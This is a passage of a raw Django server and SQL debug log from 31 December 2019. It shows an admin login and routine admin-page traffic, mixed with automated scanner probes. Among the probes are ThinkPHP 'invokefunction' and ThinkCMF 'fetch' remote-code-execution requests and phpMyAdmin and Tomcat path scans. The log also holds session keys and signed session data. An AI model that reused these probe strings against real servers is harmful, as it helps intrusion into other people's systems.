/mysql/sqlmanager/index.php HTTP/1.0" 404 6388 Not Found: /mysql/mysqlmanager/index.php [31/Dec/2019 15:41:11] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6394 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [31/Dec/2019 15:41:13] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6487 Not Found: /sqladmin/index.php [31/Dec/2019 15:41:16] "GET /sqladmin/index.php HTTP/1.0" 404 6364 Not Found: /sql/index.php [31/Dec/2019 15:41:18] "GET /sql/index.php HTTP/1.0" 404 6349 Not Found: /SQL/index.php [31/Dec/2019 15:41:20] "GET /SQL/index.php HTTP/1.0" 404 6349 Not Found: /websql/index.php [31/Dec/2019 15:41:21] "GET /websql/index.php HTTP/1.0" 404 6358 Not Found: /MySQLAdmin/index.php [31/Dec/2019 15:41:22] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6370 Not Found: /manager/html [31/Dec/2019 15:41:23] "GET /manager/html HTTP/1.0" 404 6346 [31/Dec/2019 15:43:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 15:48:08] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [31/Dec/2019 15:52:22] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [31/Dec/2019 15:52:23] "GET /dyzl/Print.asp?ArticleID=311 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [31/Dec/2019 15:52:25] "GET /xyzx/SendMail.asp?ArticleID=366 HTTP/1.0" 404 6376 [31/Dec/2019 15:53:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 15:55:02] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 15:58:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [31/Dec/2019 16:26:41] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6384 [31/Dec/2019 16:29:35] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:36:24] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:39:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 16:39:33,747 utils 2749 140297243715328 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5523839ma8mr6z673lf2lbwwoml3kftj' LIMIT 1; args=('5523839ma8mr6z673lf2lbwwoml3kftj',) DEBUG 2019-12-31 16:39:33,748 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5523839ma8mr6z673lf2lbwwoml3kftj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T16:39:33.747620+00:00'::timestamptz); args=('5523839ma8mr6z673lf2lbwwoml3kftj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 16, 39, 33, 747620, tzinfo=)) [31/Dec/2019 16:39:33] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [31/Dec/2019 16:39:33] "GET /robots.txt HTTP/1.0" 404 6354 Not Found: /favicon.ico [31/Dec/2019 16:39:33] "GET /favicon.ico HTTP/1.0" 404 6357 [31/Dec/2019 16:41:27] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:46:29] "GET / HTTP/1.0" 302 0 [31/Dec/2019 16:51:32] "GET / HTTP/1.0" 302 0 Not Found: /manager/text/list [31/Dec/2019 16:52:07] "GET /manager/text/list HTTP/1.0" 404 6361 [31/Dec/2019 16:56:35] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:04:01] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [31/Dec/2019 17:04:02] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-31 17:04:02,204 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '719o15uwkuu9fhoqcounl8a2r93lwuuy' LIMIT 1; args=('719o15uwkuu9fhoqcounl8a2r93lwuuy',) DEBUG 2019-12-31 17:04:02,206 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('719o15uwkuu9fhoqcounl8a2r93lwuuy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T17:04:02.204956+00:00'::timestamptz); args=('719o15uwkuu9fhoqcounl8a2r93lwuuy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 17, 4, 2, 204956, tzinfo=)) [31/Dec/2019 17:04:02] "GET /login/?next=/%3Fa%3Dfetch%26content%3D%253Cphp%253Edie%28%40md5%28HelloThinkCMF%29%29%253C/php%253E HTTP/1.0" 200 1936 DEBUG 2019-12-31 17:04:02,362 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hcuqg9o730henj8cnjukg45xvsrj7qo9' LIMIT 1; args=('hcuqg9o730henj8cnjukg45xvsrj7qo9',) DEBUG 2019-12-31 17:04:02,364 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hcuqg9o730henj8cnjukg45xvsrj7qo9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T17:04:02.363039+00:00'::timestamptz); args=('hcuqg9o730henj8cnjukg45xvsrj7qo9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 17, 4, 2, 363039, tzinfo=)) [31/Dec/2019 17:04:02] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [31/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:05:26] "GET / HTTP/1.0" 302 0 Not Found: /index.php [31/Dec/2019 17:08:52] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6454 [31/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:15:09] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:17:20] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:20:12] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:25:15] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:30:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:34:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:35:20] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:40:23] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:45:26] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:50:29] "GET / HTTP/1.0" 302 0 [31/Dec/2019 17:55:32] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:00:19] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:08:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 18:08:52,794 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5454yo3fr8thk8jt8ag1ji1g0ba8ipja' LIMIT 1; args=('5454yo3fr8thk8jt8ag1ji1g0ba8ipja',) DEBUG 2019-12-31 18:08:52,796 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5454yo3fr8thk8jt8ag1ji1g0ba8ipja', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T18:08:52.794836+00:00'::timestamptz); args=('5454yo3fr8thk8jt8ag1ji1g0ba8ipja', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 18, 8, 52, 794836, tzinfo=)) [31/Dec/2019 18:08:52] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:20:10] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:25:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:30:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:35:19] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:41:54] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:46:57] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:52:00] "GET / HTTP/1.0" 302 0 [31/Dec/2019 18:57:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:05:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 19:05:02,103 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'of5xq5n04ql46vmvfo8k80ttsbgkac73' LIMIT 1; args=('of5xq5n04ql46vmvfo8k80ttsbgkac73',) DEBUG 2019-12-31 19:05:02,106 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('of5xq5n04ql46vmvfo8k80ttsbgkac73', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T19:05:02.104673+00:00'::timestamptz); args=('of5xq5n04ql46vmvfo8k80ttsbgkac73', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 19, 5, 2, 104673, tzinfo=)) [31/Dec/2019 19:05:02] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 19:05:02] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [31/Dec/2019 19:05:02] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [31/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:08:35] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 19:10:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:23:34] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:28:37] "GET / HTTP/1.0" 302 0 [31/Dec/2019 19:33:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 19:33:25,292 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9kctk26u7e7vb84rv6lc5olajv32gvb7' LIMIT 1; args=('9kctk26u7e7vb84rv6lc5olajv32gvb7',) DEBUG 2019-12-31 19:33:25,295 utils 2749 140297243715328 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9kctk26u7e7vb84rv6lc5olajv32gvb7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T19:33:25.293276+00:00'::timestamptz); args=('9kctk26u7e7vb84rv6lc5olajv32gvb7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 19, 33, 25, 293276, tzinfo=)) [31/Dec/2019 19:33:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 19:33:25] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [31/Dec/2019 19:33:25] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [31/Dec/2019 19:33:25] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [31/Dec/2019 19:33:25] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 Not Found: /favicon.ico [31/Dec/2019 19:33:25] "GET /favicon.ico HTTP/1.0" 404 6344 [31/Dec/2019 19:33:25] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [31/Dec/2019 19:33:25] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 DEBUG 2019-12-31 19:33:40,130 utils 2749 140297212245760 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:33:40.117304+00:00'::timestamptz AND "django_session"."session_key" = '9kctk26u7e7vb84rv6lc5olajv32gvb7'); args=(datetime.datetime(2019, 12, 31, 19, 33, 40, 117304, tzinfo=), '9kctk26u7e7vb84rv6lc5olajv32gvb7') DEBUG 2019-12-31 19:33:40,139 utils 2749 140297212245760 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) [31/Dec/2019 19:33:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 19:33:40,400 utils 2749 140297212245760 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi' LIMIT 1; args=('fznft439752itwiwzrxfzp33cmniiobi',) DEBUG 2019-12-31 19:33:40,402 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fznft439752itwiwzrxfzp33cmniiobi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T19:33:40.400765+00:00'::timestamptz); args=('fznft439752itwiwzrxfzp33cmniiobi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 19, 33, 40, 400765, tzinfo=)) DEBUG 2019-12-31 19:33:40,404 utils 2749 140297212245760 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = '9kctk26u7e7vb84rv6lc5olajv32gvb7'; args=('9kctk26u7e7vb84rv6lc5olajv32gvb7',) DEBUG 2019-12-31 19:33:40,409 utils 2749 140297212245760 (0.003) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('9kctk26u7e7vb84rv6lc5olajv32gvb7'); args=('9kctk26u7e7vb84rv6lc5olajv32gvb7',) DEBUG 2019-12-31 19:33:40,413 utils 2749 140297212245760 (0.002) UPDATE "auth_user" SET "last_login" = '2019-12-31T19:33:40.410248+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 31, 19, 33, 40, 410248, tzinfo=), 6) DEBUG 2019-12-31 19:33:40,418 utils 2749 140297212245760 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:33:40.416985+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 33, 40, 416985, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:33:40] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-31 19:33:40,641 utils 2749 140297212245760 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:33:40.627162+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 33, 40, 627162, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:33:40,645 utils 2749 140297212245760 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:33:40,695 utils 2749 140297212245760 (0.006) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 19:33:40,709 utils 2749 140297212245760 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:33:40.706438+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 33, 40, 706438, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:33:40] "GET / HTTP/1.0" 200 8208 [31/Dec/2019 19:33:40] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [31/Dec/2019 19:33:40] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [31/Dec/2019 19:33:40] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [31/Dec/2019 19:33:40] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [31/Dec/2019 19:33:41] "GET /favicon.ico HTTP/1.0" 404 6344 DEBUG 2019-12-31 19:33:53,458 utils 2749 140297243715328 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:33:53.449426+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 33, 53, 449426, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:33:53,461 utils 2749 140297243715328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:33:53,464 utils 2749 140297243715328 (0.002) SELECT COUNT(*) AS "__count" FROM "auth_group"; args=() DEBUG 2019-12-31 19:33:53,465 utils 2749 140297243715328 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_group"; args=() DEBUG 2019-12-31 19:33:53,469 utils 2749 140297243715328 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-31 19:33:53,530 utils 2749 140297243715328 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:33:53.528615+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 33, 53, 528615, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:33:53] "GET /auth/group/ HTTP/1.0" 200 3457 [31/Dec/2019 19:33:53] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-12-31 19:33:53,729 utils 2749 140297212245760 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:33:53.717792+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 33, 53, 717792, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:33:53] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [31/Dec/2019 19:33:53] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 DEBUG 2019-12-31 19:33:53,733 utils 2749 140297212245760 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [31/Dec/2019 19:33:53] "GET /jsi18n/ HTTP/1.0" 200 3223 [31/Dec/2019 19:33:53] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [31/Dec/2019 19:33:53] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [31/Dec/2019 19:33:53] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [31/Dec/2019 19:33:53] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [31/Dec/2019 19:33:53] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [31/Dec/2019 19:33:53] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [31/Dec/2019 19:33:54] "GET /static/admin/img/search.svg HTTP/1.0" 200 458 [31/Dec/2019 19:33:54] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-31 19:33:57,566 utils 2749 140297254205184 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:33:57.551580+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 33, 57, 551580, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:33:57,570 utils 2749 140297254205184 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 19:33:57,621 utils 2749 140297254205184 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 19:33:57,635 utils 2749 140297254205184 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T19:33:57.632579+00:00'::timestamptz WHERE "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 19, 33, 57, 632579, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') [31/Dec/2019 19:33:57] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 19:34:00,883 utils 2749 140297254205184 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T19:34:00.873812+00:00'::timestamptz AND "django_session"."session_key" = 'fznft439752itwiwzrxfzp33cmniiobi'); args=(datetime.datetime(2019, 12, 31, 19, 34, 0, 873812, tzinfo=), 'fznft439752itwiwzrxfzp33cmniiobi') DEBUG 2019-12-31 19:34:00,887 utils 2749 140297254205184 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", 